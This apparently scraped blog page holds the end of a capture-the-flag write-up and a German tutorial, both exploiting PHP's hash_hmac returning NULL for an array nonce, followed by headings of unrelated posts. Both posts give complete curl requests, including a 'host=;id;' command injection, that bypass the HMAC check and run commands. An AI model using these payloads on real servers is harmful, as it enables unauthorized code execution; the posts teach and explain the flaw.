	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])
);

algo and $secret, are already being set for us. Next down the line is hash which we can blindly set via hash=a, only action needs a little attention. We have to provide a base64 encoded string. Let's encode 'a' for examplary reasons.

printf a | base64
YQ==

Now we can make a request that should result in a 401 Error.

curl -X POST -i -d 'action=YQ==&hash=a' https://db.fishbowl.tech/api/vegan/rest
HTTP/1.1 401 Tomato
# ...

Works like it's supposed to!

# Planning the attack

Since we have the source code this time, we have the ability to test our exploit on our machine, offline.

Let's copy the source and spin up a PHP Server.

cp source.php test_exploit.php
php -S 0.0.0.0:8080

Now let's clean up the file.

Remove the require_once, replace its error methods with our own and provide some useful info.

$secret = getenv('secret');
$command = array(
        'algo' => "sha256",
        'nonce' => $_POST['nonce'], 
        'hash' => $_POST['hash'], 
        'action' => base64_decode($_POST['action']) 
);

if (empty($command['action'])) {
        echo "1. Error 400: No 'action'!\n";
}

if (!in_array($command['algo'], hash_hmac_algos()) || empty($command['hash'])) {
        echo "2. Error 400: No 'hash'! \n";
}

if (!empty($command['nonce'])) {
        echo "You provided 'nonce': ".$command['nonce']."\n";
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
        echo "3. Error 401: hash_hmac does not match hash! \n";
        echo "  - hmac: ".hash_hmac($command['algo'], $command['action'], $secret)."\n";
        echo "  - hash: ".$command['hash']."\n";
        echo "Exiting now.\n";
        exit;
}

// passthru($command['action']);
echo "You got code execution with 'action' being: ".$command['action'];

Here is what an example request looks like now.

curl -X POST -d "" 0.0.0.0:8080/test_exploit.php
1. Error 400: No 'action'!
2. Error 400: No 'hash'! 
3. Error 401: hash_hmac does not match hash! 
  - hmac: b613679a0814d9ec772f95d778c35fc5ff1697c493715653c6c712144292c5ad
  - hash: 
Exiting now.

With such clean feedback from ourselves, we can inch forward.

curl -X POST -d "action=YQ==&hash=a" 0.0.0.0:8080/test_exploit.php 
3. Error 401: hash_hmac does not match hash! 
  - hmac: 9615a95d4a336118c435b9cd54c5e8644ab956b573aa2926274a1280b6674713
  - hash: a
Exiting now.

But, now comes the third roadblock: We need to know what the result of hash_hmac is.

As an attacker, my mind is always looking for things that I can influence i.e. 'over what parameters do I have what control'. In this case, we already know two out of three parameters.

hash_hmac($command['algo'], $command['action'], $secret)

We know algo and action get set in the beginning:

$command = array(
        'algo' => "sha256",
        // ...
        'action' => base64_decode($_POST['action']) 
);

Let's see what kind of control we have over $secret. There is a way to influence its value by providing nonce.

if (!empty($command['nonce'])) {
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

Again, same thought process. We already know what algo gets set to and $secret is being assigned here:

$secret = getenv('secret');

Sadly this doesn't give us an opportunity to influence its value, though. That leaves only nonce which gets assigned at the top.

$command = array(
        // ..
        'nonce' => $_POST['nonce'], 
        // ..
);

So we control the raw value of nonce. I emphasize raw here because we are able to set not only the value of nonce, but also - more importantly - its type!

When posting information to a site, you are able to specifiy that the argument is either a "normal", single value or a list of values.

In the latter case, PHP is nice enough to automatically convert a list to an array!

Since PHP is a Loosely Typed language, this can sometimes lead to unexpected behaviour when you don't check the type of the variable you're working with. A very basic example that can bite you in the butt is weak comparisons of strings and numbers.

Strings starting with a number automatically get converted to integers/floats see:

php > var_dump(123 == 123);
bool(true)

php > var_dump(123 == "123");
bool(true)

php > var_dump(123 == "123.0");
bool(true)

php > var_dump(123 == "123example");
bool(true)

php > var_dump(123 == "example123");
bool(false)

So that raises the question: What happens to hash_hmac when we provide an array instead of a string?

php > var_dump(hash_hmac('sha256', array(), "secret"));
PHP Warning:  hash_hmac() expects parameter 2 to be string, array given in php shell code on line 1
NULL

PHP is so kind and warns us about the type but does not error out! It just keeps running and returns NULL.

Remember, we're trying to influence the assigned value of $secret, which we now can!

if (!empty($command['nonce'])) {
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

When providing a list for nonce, $secret is gonna be NULL!

This in turn, means that we now know all the parameters of the call to hash_hmac here

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
	error(401);
	exit;
}

algo has the fixed value "sha256"
action = base64 decoded $_POST['action']
$secret is going to be NULL because we control nonce
hash we control via $_POST['hash']

# Attack

Finally, let's calculate the values we need: action and hash

// action
php > echo base64_encode("id");
aWQ=

And for the hash we can use our PHP Server:

curl -X POST -d "action=aWQ=&hash=a&nonce[]=" 0.0.0.0:8080/test_exploit.php
You provided 'nonce': Array
3. Error 401: hash_hmac does not match hash! 
  - hmac: 34ce0b031abf5f1f67ab9dfdae781582fdec327df7838c70fcefa9a68e49b909
  - hash: a
Exiting now.

Now we have all the information needed to construct our real payload.

curl -X POST -d "action=aWQ=&hash=34ce0b031abf5f1f67ab9dfdae781582fdec327df7838c70fcefa9a68e49b909&nonce[]=" https://db.fishbowl.tech/api/vegan/rest
-----BEGIN FISHBOWL FLAG-----
v4LlsWnBMbNXsHXhGpet22bp1elj8F8FDc0eglJrsDrj0Usj
3h8B9XgD+rE+4yX6YAbbx1lz7sZLu76r5t4fY07S+H/1sDKG
+tiEjLnqKmF4Vd44auh75LwMb/1V5/J9xBDdKdsXQW8aTWov
NDzwDaeAnrCYo7oR5OEPEEMlapufZWnrIlDrbQEueyPArNYb
o/fPnJBj7dtVXrEV64qwHBKNll1Kqo45+Xa4w3Jb04g9i1EE
+7+oYAx8RfxOCtLrfFEnMpCTtdn8MMRoUt4IQDQgV2AimxnH
k0qWr6d27dkn07BiJSTZ30Hjj/2GjW0xxfNHXxfey3nFKCEX
G6VcemwSOcbkq0NI1EFweXe/f104eGx+fpK56mXzrBVwFCpq
YffkwzD+K08Xw0HDEUyVVFqpgUmLHi0j4awsPlZLq/b5xC1z
R7ZbKOXyC/VdouFmjCTQG5Cw2fsP7X4j0bbiclMaXYLb0msl
xeUpiCw8DpTXY9XE6btnWCKhkjiWlAGVJq/DX/j83Q8VhGgK
Mb6/7WS8EzyWNU5TyzdSLB/0Gqd24fVBY7pgPlcPRkQFFhE1
AsHGSR+e/MlZU5OWKZapyzU4j5Ua4fBC5u5XBNiVxZK/RxvV
I2So7vPwiFxcO4QWkte9DKp+A452wR0dMcjhwvDwwpw68BwP
FLqVxxdKA1Y=
-----END FISHBOWL FLAG-----

And there you have it! A flag!

# Closing words

I genuinely enjoyed solving the challenges and creating the writeup. If I could get an invite for the TROOPERS Conference, that would mean the world to me. When I solved the challenges I felt so giddy with excitement, here's my original tweet from way back in octobre.

Please make it happen TROOPERS Team. <3

Thank you all for reading, really do appreciate it.

# Update 2018-12-18

I got invited to TROOPERS!! <3

Thank you so much.

'Finde den tödlichen Bug' - oder: Warum niemand PHP mag

Daniel Biegler — Fri, 06 Apr 2018 22:26:00 +0000

Kürzlich habe Ich einen Tweet vom User @xxByte gefunden, in dem er im folgenden Code-Beispiel nach dem "tödlichen Bug" gefragt hat.

Daran werde Ich versuchen euch zu verdeutlichen, warum so viele Programmierer PHP gegenüber abgeneigt sind.

"Du bist ohne Zweifel die schlechteste Programmiersprache von der Ich je gehört habe."
"ABER - du hast von mir gehört!"

Tipp: Ich werde den Code Schritt für Schritt durchgehen, ist noch nicht nötig den ganzen Block zu verstehen.

Was macht der Code?

Grob gesagt wird ein Service angeboten mit dem man sich die IP-Adressen von Domains anzeigen lassen kann. Beispielsweise wenn Ich eine Webseite öffnen will, muss mein Computer ja wissen wo (Adresse) sich die Seite befindet.
Dafür wird hier das kleine Programm host benutzt.

Das kann wie folgt aussehen:

host google.de
google.de has address 172.217.21.227
google.de has IPv6 address 2a00:1450:4001:806::2003

Los geht's

Auf den ersten Blick sollte einem direkt Zeile 19 ins Auge springen.

echo exec("host ".$_POST['host']);

Wenn man dem Server Daten schicken will, kann man das über einen so genannten POST-Request machen. Beschreibung von Wikipedia:

schickt unbegrenzte, je nach physischer Ausstattung des eingesetzten Servers, Mengen an Daten zur weiteren Verarbeitung zum Server [...]

PHP gibt einem Zugriff auf diese Daten in der Variable $_POST, das bedeutet wir als User können diese Variable (mehr oder weniger) kontrollieren.

exec() macht laut PHP-Doku:

exec — Führt ein externes Programm aus

Es wäre im Interesse eines Angreifers z.B. ein Datenbank-Programm auszuführen um Daten zu klauen bzw. zu setzen oder zu löschen.

Unser Ziel ist also schon mal klar, aber wie kommen wir da hin?

Der Knackpunkt befindet sich hier:

$hmac = hash_hmac('sha256', $_POST['host'], $secret);
		
if($hmac !== $_POST['hmac']) {
	header('HTTP/1.0 403 Forbidden');
	exit;
}

echo exec("host ".$_POST['host']);

Wir vergleichen die Serverseitige Variable $hmac mit der vom User gesetzten Variable hmac.

Falls die beiden gleich sind, gelangen wir zu exec() , unserem Ziel.
Falls die beiden unterschiedlich sind beenden wir das Programm via exit .

Um kurz allgemein zusammenzufassen:

Wir schicken dem Server Daten
Der Server vergleicht Daten
Falls Sicherheitschecks fehlschlagen, beenden wir
Falls diese erfolgreich sind, führen wir Code aus

OK, soweit so gut. -

Schauen wir uns an wie die Variable $hmac generiert wird.

$hmac = hash_hmac('sha256', $_POST['host'], $secret);

Wir weisen $hmac das Ergebnis der Funktion hash_hmac() zu. Ein Blick in die PHP-Doku sagt uns:

hash_hmac — Berechnet einen Hash mit Schlüssel unter Verwendung von HMAC

Ein wenig anders ausgedrückt heißt das, dass diese Funktion eine Nachricht und einen Schlüssel dazu benutzt eine einzigartige Zeichenfolge zu erstellen.

Für jemanden der sich damit nie beschäftigt hat, kann das ein wenig schwer zu verstehen sein, deshalb hab ich hier eine kleine vergleichbare Demo vorbereitet.

Du kannst zwei Dinge eingeben, eine Nachricht und einen Schlüssel. Das Ergebnis sollte automatisch aktualisieren.

Nachricht:

Schlüssel:

Zeichenfolge:

Eine bestimmte Eingabe=E_1, liefert immer eine bestimmte Ausgabe=A_1. Diese Ausgabe A_1, kann nur mit der bestimmten Eingabe E_1 generiert werden. Wenn ich eine andere Eingabe E_2 eingebe, kriege ich nicht mehr A_1 sondern eine andere Ausgabe A_2 - aka, 'einzigartige Zeichenfolge'.

Probier es aus, gib irgendetwas ein und sieh zu wie sich die Ausgabe bei jedem Zeichen wieder ändert.

Hier sind ein paar echte Beispielausgaben:

hash_hmac('md5', 'Nachricht', 'Schlüssel');
"eecaaeceed73c85d78c6092feb3fc80b"

hash_hmac('md5', 'kurz', 'abc123');
"bb025ddb83ba74b2340ecec3da11e0d7"

hash_hmac('md5', 'kurz', 'abc1234');
"9e28d712f8f5a71278e41ee904cf06ca"

hash_hmac('md5', 'super mega lange nachricht blabla', 'abc123');
"a1531f330796348872d66400272c9df4"

Siehst du was Ich mit 'Zeichenfolge' meine?

Hier gibts einige interessante Eigenschaften die dir wahrscheinlich aufgefallen sind.

Jede Ausgabe hat die gleiche Größe, egal wie lang die Eingaben sind. (hier 32 Zeichen)
Beim kleinsten Unterschied, ob bei Nachricht oder Schlüssel, sieht die Ausgabe drastisch anders aus.
Es gibt folgende Zeichen in den Folgen: abcdef0123456789

Wir wissen nun wie die Zeichenfolge aussehen wird.

Was brauchen wir zur Erstellung?

Die Nachricht kontrollieren wir durch Variable host (Zeile 12) - schauen wir uns an woher der Schlüssel $secret kommt.

$secret = getenv("SECRET");

if(isset($_POST['nonce']))
	$secret = hash_hmac('sha256', $_POST['nonce'], $secret);
    
$hmac = hash_hmac('sha256', $_POST['host'], $secret);

Als erstes wird $secret Serverseitig gesetzt, wir wissen nicht was sich drin befindet. Jetzt wirds interessant, falls der Benutzer die Variable nonce(?) gesetzt hat überschreiben wir $secret mit einer neuen Zeichenfolge.

Das bedeutet:

Wenn wir rauskriegen könnten was in $secret steht, würden wir beide Parameter für $hmac kennen und das würde Code-Ausführung bewirken!

"Ähm, wir kennen $secret doch gar nicht, das ist Serverseitig! Daher können wir gar nicht wissen was hash_hmac() erzeugt."
- Du

Ja, das wäre eigentlich so korrekt, aber jetzt kommt unser geliebtes PHP ins Spiel.

Am Anfang wurde gesagt dass wir Daten, hier nonce, via POST-Request an den Server schicken können. Wir haben zwei Möglichkeiten, wir können dem Server sagen dass nonce entweder eine Zeichenfolge - oder - eine Liste ist.

Listen werden dazu genutzt um Daten zu bündeln.

Beispiel: Ich habe eine Seite wo Benutzer Fotos hochladen können. Wenn also jemand 22 Fotos hochladen möchte, bräuchte der Server 22 Variablen um die hochgeladenen Fotos verarbeiten zu können. Es bietet sich also viel mehr an dem Server direkt mitzuteilen, dass Ich ihm eine Liste von Fotos schicke, dann kann er mit nur einer Variable alle Fotos ansprechen.

Was macht also PHP wenn die Nachricht in der hash_hmac-Funktion eine Liste ist?

hash_hmac('md5', array(), 'schlüssel');
"PHP Warning:  hash_hmac() expects parameter 2 to be string, 
array given in php shell code on line 1"
NULL

Nur eine Warnung. Unglaublich.

Jetzt kommt auch noch das aller beste: Es steht in der offiziellen Dokumentation nichts zu diesem Verhalten. Man kriegt das nur über benutzer-erstellte Kommentare/Posts mit. Hier ein Auszug aus der Doku:

Rückgabewerte

Gibt den berechneten Hash als Hexadezimalzahl zurück, außer raw_output ist wahr, in diesem Fall wird die binäre Darstellung des Hashes zurückgegeben. Gibt FALSE zurück, wenn algo nicht bekannt oder eine nicht-kryptographische Hash-Funktion ist.

NULL wird überhaupt nicht erwähnt.

"Willkommen bei PHP, wo die Syntax frei erfunden ist und die Regeln keine Rolle spielen!"

Der Angriff

1. Parameter:

Angenommen wir greifen nun an. Es wäre gut zu wissen unter welchem Benutzer PHP auf dem Server läuft. Es gibt ein kleines Programm id welches einem den aktuellen Benutzer und seine Gruppen anzeigt.

Unsere Variable host muss also host=;id; sein.

2. Parameter:

Wir generieren via PHP die korrekte hmac

hash_hmac('sha256', ';id;', NULL);
"206a5d01dee603ea7486045355935ff23d878fd0be5104fd4a465618bfa699bb"

3. Parameter:

Wir sagen dem Server via nonce[]= dass die nonce eine Liste sein soll.

Voilà:

curl -X POST -d "host=;id;&hmac=206a5d01dee603ea7486045355935ff23d878fd0be5104fd4a465618bfa699bb&nonce[]=" http://0.0.0.0:8080
uid=1000(phpuser) gid=100(users) groups=100(users),3(sys)

Auf dem Server läuft PHP über den Benutzer phpuser. Unser Angriff war erfolgreich und wir haben Code-Ausführung auf dem Server!

Jetzt ist es nur noch eine Frage der Zeit bis der Angreifer was Interessantes findet und Schaden anrichten kann.

Fazit

Man muss wirklich dringend aufpassen, man kann sich nicht immer auf die offizielle Doku verlassen. Das hier ist bei weitem nicht die einzige verwundbare Funktion.

Fehler machen ist wirklich sehr leicht in PHP und das kann fatale Folgen haben.

Was wir heute gelernt haben

Immer davon ausgehen, dass eingehende Daten von Benutzern böse sind, deswegen Inhalt UND den Typ der eingehenden Daten überprüfen.
Andere Quellen neben der offiziellen Doku aufsuchen.

danielbiegler.de

From idea to proto­type overnight: A Vue.js Post-Mortem

Preamble

What the project was about

The Problem

The Solution

My approach

It's simply not worth it to put in the time for a project of this size before you get approval in writing.

What does "Faking it" mean

Real

Fake

My Prototype

1. Login

Yea.. ¯\_(ツ)_/¯

2. Search

3. Part Profile

How the presentations went

What would I do differently next time

Conclusion

Visualizing genome data, working with contem­porary artist Davide Balula

Abstract

Contents

How it all began

The project idea

Here come the problems

In my case, I needed to be able to design the layout of the text for printing.

Original hypothesis

seqsplit – Split long sequences of characters in a neutral way

dnaseq – Format DNA base sequences

Wait. Didn't I rule out this Word processor?

First progress

Breakthrough

Bottleneck

Font Kerning

First printing test

Processing and assembling sequence data

Oh my sweet summer child.. sigh

I mean, just look at it.

I was trying to generate the consensus sequence with the GRCh38 assembly instead of the hg19 one. This was finally the breakthrough that I so desperately needed.

Processing pipeline step by step

1. Find out where the different chromosomes start and end so that you can carve them out of the consensus sequence.

2. Remove comments and unneeded symbols

3. Fold the lines to a fixed length so we avoid line breaks

4. Add some markup so we can insert the sequence data into the LibreOffice document

1. Retrieve the content.xml from our master.odt

2. Insert the sequence into the content.xml file

3. Rezip the content.xml into a document

4. Convert the document to PDF

Conclusion

Writing my own Stock-Watchlist App in Flutter - Minimum Viable Experiment

What pushed me over the edge to start this

Developing an app - where to start?

Making the first prototype

Problems

What's next

Did you enjoy this?

How to hack your coffee machine to serve you via WiFi

Table of contents

Hardware used / What you need

Step 1:Decide on functionality

Step 2:Identify which connections need soldering

Step 3:Figure out how a relay board works

Step 4:Figure out how to control the relay board

How do we interact with a GPIO pin?

How do we tell the Pi when to flip the pin (relay)?

How do we send a network request?

Step 5Decide where to put the Pi

Step 6:Begin soldering

WARNING: I'd suggest only doing this if you truly know what you're doing! Working with such high voltages is dangerous. Only attempt this if you know what you're doing.

Step 7Setup needed software

How exactly do we control the GPIO pins

Setup the GPIO pins we need

A quick recap

Deploy the website

The website in action

Step 8Connecting coffee machine to relay

You should be done now.

Closing words

Learn Interactively: Binary Code

0

From idea to prototype overnight: A Vue.js Post-Mortem

Visualizing genome data, working with contemporary artist Davide Balula

I was trying to generate the consensus sequence with the `GRCh38` assembly instead of the `hg19` one. This was finally the breakthrough that I so desperately needed.

Step 1:
Decide on functionality

Step 2:
Identify which connections need soldering

Step 3:
Figure out how a relay board works

Step 4:
Figure out how to control the relay board

Step 5
Decide where to put the Pi

Step 6:
Begin soldering

Step 7
Setup needed software

Step 8
Connecting coffee machine to relay

# Investigate `/.git/`

"Du bist ohne Zweifel die schlechteste Programmiersprache von der Ich je gehört habe."
"ABER - du hast von mir gehört!"